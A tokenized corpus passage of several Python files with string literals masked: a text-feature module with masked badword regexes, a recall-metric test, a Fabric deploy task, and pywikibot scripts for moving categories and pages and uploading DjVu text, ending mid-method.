<s> from . features import Dictionary , RegexMatches , Stemmed , Stopwords <EOL> name = "<STR_LIT>" <EOL> try : <EOL> import enchant <EOL> dictionary = enchant . Dict ( "<STR_LIT>" ) <EOL> except enchant . errors . DictNotFoundError : <EOL> raise ImportError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> dictionary = Dictionary ( name + "<STR_LIT>" , dictionary . check ) <EOL> """<STR_LIT>""" <EOL> try : <EOL> from nltk . corpus import stopwords as nltk_stopwords <EOL> stopwords = set ( nltk_stopwords . words ( '<STR_LIT>' ) ) <EOL> except LookupError : <EOL> raise ImportError ( "<STR_LIT>" . format ( __name__ ) + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> stopwords = Stopwords ( name + "<STR_LIT>" , stopwords ) <EOL> """<STR_LIT>""" <EOL> try : <EOL> from nltk . stem . snowball import SnowballStemmer <EOL> stemmer = SnowballStemmer ( "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise ImportError ( "<STR_LIT>" . format ( __name__ ) ) <EOL> stemmed = Stemmed ( name + "<STR_LIT>" , stemmer . 
stem ) <EOL> """<STR_LIT>""" <EOL> badword_regexes = [ <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , "<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" <EOL> ] <EOL> badwords = RegexMatches ( name + "<STR_LIT>" , badword_regexes ) <EOL> """<STR_LIT>""" <EOL> informal_regexes = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , 
<EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> informals = RegexMatches ( name + "<STR_LIT>" , informal_regexes ) <EOL> """<STR_LIT>""" </s>
<s> from nose . tools import eq_ <EOL> from . . recall import recall <EOL> def test_boolean ( ) : <EOL> test_statistic = recall ( ) <EOL> score_labels = [ <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) <EOL> ] <EOL> all_right , half_right , labels = zip ( * score_labels ) <EOL> stats = test_statistic . score ( all_right , labels ) <EOL> eq_ ( stats , <NUM_LIT:1.0> ) <EOL> stats = test_statistic . score ( half_right , labels ) <EOL> eq_ ( stats , <NUM_LIT:1.0> ) <EOL> eq_ ( test_statistic . format ( stats ) , "<STR_LIT>" ) <EOL> eq_ ( test_statistic . 
format ( stats , format = "<STR_LIT>" ) , <NUM_LIT:1.0> ) <EOL> def test_multiclass ( ) : <EOL> test_statistic = recall ( ) <EOL> score_labels = [ <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:b>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:c>" } , "<STR_LIT:c>" ) <EOL> ] <EOL> all_right , sometimes_right , labels = zip ( * score_labels ) <EOL> stats = test_statistic . 
score ( all_right , labels ) <EOL> eq_ ( test_statistic . format ( stats , format = "<STR_LIT>" ) , <EOL> { '<STR_LIT:b>' : <NUM_LIT:1.0> , '<STR_LIT:c>' : <NUM_LIT:1.0> , '<STR_LIT:a>' : <NUM_LIT:1.0> } ) <EOL> stats = test_statistic . score ( sometimes_right , labels ) <EOL> eq_ ( test_statistic . format ( stats , format = "<STR_LIT>" ) , <EOL> { '<STR_LIT:b>' : <NUM_LIT> , '<STR_LIT:a>' : <NUM_LIT:1.0> , '<STR_LIT:c>' : <NUM_LIT> } ) <EOL> assert len ( test_statistic . format ( stats ) ) > <NUM_LIT:5> </s>
<s> from fabric . api import task , env , sudo , cd <EOL> tool_name = '<STR_LIT>' <EOL> env . hosts = [ '<STR_LIT>' ] <EOL> env . sudo_user = '<STR_LIT>' . format ( tool_name ) <EOL> env . sudo_prefix = '<STR_LIT>' <EOL> env . use_ssh_config = True <EOL> home_dir = '<STR_LIT>' . format ( tool_name ) <EOL> code_dir = '<STR_LIT>' . format ( home_dir ) <EOL> @ task <EOL> def deploy ( * args ) : <EOL> with cd ( code_dir ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> import wikipedia as pywikibot <EOL> import catlib <EOL> from category import * <EOL> redirect_templates = [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' ] <EOL> move_message = u'<STR_LIT>' <EOL> cooldown = <NUM_LIT:7> <EOL> def get_redirect_cat ( category = None ) : <EOL> """<STR_LIT>""" <EOL> destination = None <EOL> site = pywikibot . getSite ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> for template in category . templatesWithParams ( ) : <EOL> if ( ( template [ <NUM_LIT:0> ] in redirect_templates ) and ( len ( template [ <NUM_LIT:1> ] ) > <NUM_LIT:0> ) ) : <EOL> destination = catlib . Category ( site , template [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> if not destination . exists ( ) : <EOL> return None <EOL> return destination <EOL> def readyToEdit ( old_category ) : <EOL> """<STR_LIT>""" <EOL> dateformat = "<STR_LIT>" <EOL> today = datetime . now ( ) <EOL> deadline = today + timedelta ( days = - cooldown ) <EOL> old_category . get ( ) <EOL> return ( deadline . strftime ( dateformat ) > old_category . editTime ( ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> site = pywikibot . getSite ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> dirtycat = catlib . Category ( site , u'<STR_LIT>' ) <EOL> destination = None <EOL> catbot = None <EOL> for old_category in dirtycat . subcategories ( ) : <EOL> if ( readyToEdit ( old_category ) ) : <EOL> destination = get_redirect_cat ( old_category ) <EOL> if destination : <EOL> pywikibot . output ( destination . title ( ) ) <EOL> for page in old_category . articles ( ) : <EOL> try : <EOL> catlib . change_category ( <EOL> page , old_category , destination , move_message <EOL> % ( old_category . title ( ) , <EOL> old_category . title ( withNamespace = False ) , <EOL> destination . title ( ) , <EOL> destination . 
title ( withNamespace = False ) ) ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> for cat in old_category . subcategories ( ) : <EOL> try : <EOL> catlib . change_category ( <EOL> cat , old_category , destination , move_message <EOL> % ( old_category . title ( ) , <EOL> old_category . title ( withNamespace = False ) , <EOL> destination . title ( ) , <EOL> destination . title ( withNamespace = False ) ) ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> try : <EOL> old_category . put ( old_category . get ( ) ) <EOL> except : <EOL> pywikibot . output ( u'<STR_LIT>' % old_category . title ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import os <EOL> import sys <EOL> import codecs <EOL> import pywikibot <EOL> from pywikibot import i18n <EOL> import config <EOL> docuReplacements = { <EOL> } <EOL> class DjVuTextBot : <EOL> def __init__ ( self , djvu , index , pages , ask = False , overwrite = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . djvu = djvu <EOL> self . index = index <EOL> self . pages = pages <EOL> self . ask = ask <EOL> self . overwrite = overwrite <EOL> def NoOfImages ( self ) : <EOL> cmd = u"<STR_LIT>" % ( self . djvu ) <EOL> count = os . popen ( cmd . encode ( sys . stdout . encoding ) ) . readline ( ) . rstrip ( ) <EOL> count = int ( count ) <EOL> pywikibot . output ( "<STR_LIT>" % count ) <EOL> return count <EOL> def PagesGenerator ( self ) : <EOL> start = <NUM_LIT:1> <EOL> end = self . NoOfImages ( ) <EOL> if self . pages : <EOL> pos = self . pages . find ( '<STR_LIT:->' ) <EOL> if pos != - <NUM_LIT:1> : <EOL> start = int ( self . pages [ : pos ] ) <EOL> if pos < len ( self . pages ) - <NUM_LIT:1> : <EOL> end = int ( self . pages [ pos + <NUM_LIT:1> : ] ) <EOL> else : <EOL> start = int ( self . pages ) <EOL> end = start <EOL> pywikibot . output ( u"<STR_LIT>" % ( start , end ) ) <EOL> return range ( start , end + <NUM_LIT:1> ) <EOL> def run ( self ) : <EOL> pywikibot . setAction ( i18n . twtranslate ( pywikibot . getSite ( ) , <EOL> '<STR_LIT>' ) ) <EOL> linkingPage = pywikibot . Page ( pywikibot . getSite ( ) , self . index ) <EOL> self . prefix = linkingPage . title ( withNamespace = False ) <EOL> if self . prefix [ <NUM_LIT:0> : <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> self . prefix = self . prefix [ <NUM_LIT:6> : ] <EOL> pywikibot . output ( u"<STR_LIT>" % self . prefix ) <EOL> gen = self . PagesGenerator ( ) <EOL> site = pywikibot . getSite ( ) <EOL> self . username = config . usernames [ site . family . name ] [ site . lang ] <EOL> for pageno in gen : <EOL> pywikibot . output ( "<STR_LIT>" % pageno ) <EOL> self . 
treat ( pageno ) <EOL> def has_text ( self ) : <EOL> cmd = u"<STR_LIT>" % ( self . djvu , self . djvu ) <EOL> os . system ( cmd . encode ( sys . stdout . encoding ) ) <EOL> f = codecs . open ( u"<STR_LIT>" % self . djvu , '<STR_LIT:r>' , <EOL> config . textfile_encoding , '<STR_LIT:replace>' ) <EOL> s = f . read ( ) <EOL> f . close ( ) <EOL> return s . find ( '<STR_LIT>' ) >= <NUM_LIT:0> <EOL> def get_page ( self , pageno ) : <EOL> pywikibot . output ( unicode ( "<STR_LIT>" % ( pageno ) ) ) <EOL> cmd = u"<STR_LIT>" % ( pageno , self . djvu , self . djvu ) <EOL> os . system ( cmd . encode ( sys . stdout . encoding ) ) <EOL> f = codecs . open ( u"<STR_LIT>" % self . djvu , '<STR_LIT:r>' , <EOL> config . textfile_encoding , '<STR_LIT:replace>' ) <EOL> djvu_text = f . read ( ) <EOL> f . close ( ) <EOL> return djvu_text <EOL> def treat ( self , pageno ) : <EOL> """<STR_LIT>""" <EOL> site = pywikibot . getSite ( ) <EOL> page_namespace = site . mediawiki_message ( '<STR_LIT>' ) <EOL> page = pywikibot . Page ( site , u'<STR_LIT>' <EOL> % ( page_namespace , self . prefix , pageno ) ) <EOL> exists = page . exists ( ) <EOL> djvutxt = self . get_page ( pageno ) <EOL> if not djvutxt : <EOL> text = ( u'<STR_LIT>' <EOL> % ( self . username ) ) <EOL> else : <EOL> text = ( u'<STR_LIT>' <EOL> % ( self . username , djvutxt ) ) <EOL> text = text . replace ( '<STR_LIT:U+0020>' , "<STR_LIT:\n>" ) <EOL> text = text . replace ( '<STR_LIT:U+0020>' , "<STR_LIT:\n>" ) <EOL> text = text . replace ( '<STR_LIT:U+0020>' , "<STR_LIT:\n>" ) <EOL> ask = self . ask <EOL> if exists : <EOL> ask = True <EOL> old_text = page . get ( ) <EOL> if old_text == text : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( asLink = True ) ) <EOL> return <EOL> else : <EOL> old_text = '<STR_LIT>' <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( ) ) <EOL> pywikibot . showDiff ( old_text , text ) <EOL> if ask : <EOL> if self . 
overwrite == '<STR_LIT:n>' : <EOL> choice = '<STR_LIT:n>' <EOL> pywikibot . output ( u"<STR_LIT>" ) <EOL> elif self . overwrite == '<STR_LIT:y>' : <EOL> choice = '<STR_LIT:y>' <EOL> pywikibot . output ( u"<STR_LIT>" ) <EOL> else : <EOL> choice = pywikibot . inputChoice ( u'<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:N>' ] , '<STR_LIT:N>' ) <EOL> else : <EOL> choice = '<STR_LIT:y>' <EOL> if choice == '<STR_LIT:y>' : <EOL> try : <EOL> page . put_async ( text ) <EOL> except pywikibot . LockedPage : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( asLink = True ) ) <EOL> except pywikibot . EditConflict : <EOL> pywikibot . output ( u'<STR_LIT>' % ( page . title ( ) ) ) <EOL> except pywikibot . SpamfilterError , error : <EOL> pywikibot . output ( u'<STR_LIT>' % ( page . title ( ) , error . url ) ) <EOL> def main ( ) : <EOL> index = None <EOL> djvu = None <EOL> pages = None <EOL> ask = False <EOL> overwrite = '<STR_LIT>' <EOL> for arg in pywikibot . handleArgs ( ) : <EOL> if arg . startswith ( "<STR_LIT>" ) : <EOL> ask = True <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> overwrite = arg [ <NUM_LIT:11> : <NUM_LIT:12> ] <EOL> if overwrite != '<STR_LIT:y>' and overwrite != '<STR_LIT:n>' : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" % arg ) <EOL> overwrite = '<STR_LIT>' <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> djvu = arg [ <NUM_LIT:6> : ] <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> index = arg [ <NUM_LIT:7> : ] <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> pages = arg [ <NUM_LIT:7> : ] <EOL> else : <EOL> pywikibot . output ( u"<STR_LIT>" % arg ) <EOL> if djvu : <EOL> os . stat ( djvu ) <EOL> if not index : <EOL> import os . path <EOL> index = os . path . basename ( djvu ) <EOL> if djvu and index : <EOL> site = pywikibot . getSite ( ) <EOL> index_page = pywikibot . Page ( site , index ) <EOL> if site . family . name != '<STR_LIT>' : <EOL> raise pywikibot . PageNotFound ( <EOL> u"<STR_LIT>" % site . 
family . name ) <EOL> if not index_page . exists ( ) and index_page . namespace ( ) == <NUM_LIT:0> : <EOL> index_namespace = site . mediawiki_message ( <EOL> '<STR_LIT>' ) <EOL> index_page = pywikibot . Page ( pywikibot . getSite ( ) , <EOL> u"<STR_LIT>" % ( index_namespace , index ) ) <EOL> if not index_page . exists ( ) : <EOL> raise pywikibot . NoPage ( u"<STR_LIT>" % index ) <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % ( djvu , index_page . title ( asLink = True ) ) ) <EOL> bot = DjVuTextBot ( djvu , index , pages , ask , overwrite ) <EOL> if not bot . has_text ( ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> bot . run ( ) <EOL> else : <EOL> pywikibot . showHelp ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import family <EOL> class Family ( family . Family ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> family . Family . __init__ ( self ) <EOL> self . name = u'<STR_LIT>' <EOL> self . langs = { <EOL> u'<STR_LIT>' : None , <EOL> } <EOL> self . namespaces [ <NUM_LIT:4> ] = { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , self . namespaces [ <NUM_LIT:4> ] [ '<STR_LIT>' ] ] , <EOL> } <EOL> self . namespaces [ <NUM_LIT:5> ] = { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , self . namespaces [ <NUM_LIT:5> ] [ '<STR_LIT>' ] ] , <EOL> } <EOL> self . namespaces [ <NUM_LIT:100> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> self . namespaces [ <NUM_LIT> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> self . namespaces [ <NUM_LIT> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> self . namespaces [ <NUM_LIT> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> def hostname ( self , code ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' <EOL> def version ( self , code ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" <EOL> def scriptpath ( self , code ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import sys <EOL> import re <EOL> import pywikibot <EOL> from pywikibot import i18n <EOL> import pagegenerators <EOL> docuReplacements = { <EOL> '<STR_LIT>' : pagegenerators . parameterHelp , <EOL> } <EOL> class MovePagesBot : <EOL> def __init__ ( self , generator , addprefix , noredirect , always , skipredirects , <EOL> summary ) : <EOL> self . generator = generator <EOL> self . addprefix = addprefix <EOL> self . leaveRedirect = not noredirect <EOL> self . always = always <EOL> self . skipredirects = skipredirects <EOL> self . summary = summary <EOL> def moveOne ( self , page , newPageTitle ) : <EOL> try : <EOL> msg = self . summary <EOL> if not msg : <EOL> msg = i18n . twtranslate ( pywikibot . getSite ( ) , '<STR_LIT>' ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( page . title ( asLink = True ) , <EOL> newPageTitle ) ) <EOL> page . move ( newPageTitle , msg , throttle = True , <EOL> leaveRedirect = self . leaveRedirect ) <EOL> except pywikibot . NoPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> except pywikibot . LockedPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> except pywikibot . PageNotSaved , e : <EOL> pywikibot . output ( e . message ) <EOL> def treat ( self , page ) : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( ) ) <EOL> if self . skipredirects and page . isRedirectPage ( ) : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> return <EOL> pagetitle = page . title ( withNamespace = False ) <EOL> namesp = page . site ( ) . namespace ( page . namespace ( ) ) <EOL> if self . appendAll : <EOL> newPageTitle = ( u'<STR_LIT>' <EOL> % ( self . pagestart , pagetitle , self . pageend ) ) <EOL> if not self . noNamespace and namesp : <EOL> newPageTitle = ( u'<STR_LIT>' % ( namesp , newPageTitle ) ) <EOL> elif self . 
regexAll : <EOL> newPageTitle = self . regex . sub ( self . replacePattern , pagetitle ) <EOL> if not self . noNamespace and namesp : <EOL> newPageTitle = ( u'<STR_LIT>' % ( namesp , newPageTitle ) ) <EOL> if self . addprefix : <EOL> newPageTitle = ( u'<STR_LIT>' % ( self . addprefix , pagetitle ) ) <EOL> if self . addprefix or self . appendAll or self . regexAll : <EOL> if not self . always : <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' % newPageTitle , <EOL> [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:all>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:n>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:a>' : <EOL> self . always = True <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> elif choice2 == '<STR_LIT:n>' : <EOL> pass <EOL> else : <EOL> self . treat ( page ) <EOL> else : <EOL> self . moveOne ( page , newPageTitle ) <EOL> else : <EOL> choice = pywikibot . inputChoice ( u'<STR_LIT>' , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:c>' , '<STR_LIT:a>' , '<STR_LIT:r>' , '<STR_LIT:n>' , '<STR_LIT:q>' ] ) <EOL> if choice == '<STR_LIT:c>' : <EOL> newPageTitle = pywikibot . input ( u'<STR_LIT>' ) <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice == '<STR_LIT:a>' : <EOL> self . pagestart = pywikibot . input ( u'<STR_LIT>' ) <EOL> self . pageend = pywikibot . input ( u'<STR_LIT>' ) <EOL> newPageTitle = ( u'<STR_LIT>' <EOL> % ( self . pagestart , pagetitle , self . pageend ) ) <EOL> if namesp : <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % namesp , [ '<STR_LIT:yes>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:n>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> noNamespace = True <EOL> else : <EOL> newPageTitle = ( u'<STR_LIT>' % ( namesp , newPageTitle ) ) <EOL> choice2 = pywikibot . 
inputChoice ( <EOL> u'<STR_LIT>' <EOL> % newPageTitle , [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:all>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:y>' , '<STR_LIT:n>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:a>' : <EOL> self . appendAll = True <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> elif choice2 == '<STR_LIT:n>' : <EOL> pass <EOL> else : <EOL> self . treat ( page ) <EOL> elif choice == '<STR_LIT:r>' : <EOL> searchPattern = pywikibot . input ( u'<STR_LIT>' ) <EOL> self . replacePattern = pywikibot . input ( <EOL> u'<STR_LIT>' ) <EOL> self . regex = re . compile ( searchPattern ) <EOL> if page . title ( ) == page . title ( withNamespace = False ) : <EOL> newPageTitle = self . regex . sub ( self . replacePattern , <EOL> page . title ( ) ) <EOL> else : <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % namesp , [ '<STR_LIT:yes>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:n>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> newPageTitle = self . regex . sub ( <EOL> self . replacePattern , page . title ( withNamespace = False ) ) <EOL> noNamespace = True <EOL> else : <EOL> newPageTitle = self . regex . sub ( self . replacePattern , <EOL> page . title ( ) ) <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % newPageTitle , [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:all>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:y>' , '<STR_LIT:n>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:a>' : <EOL> self . regexAll = True <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> elif choice2 == '<STR_LIT:n>' : <EOL> pass <EOL> else : <EOL> self . 
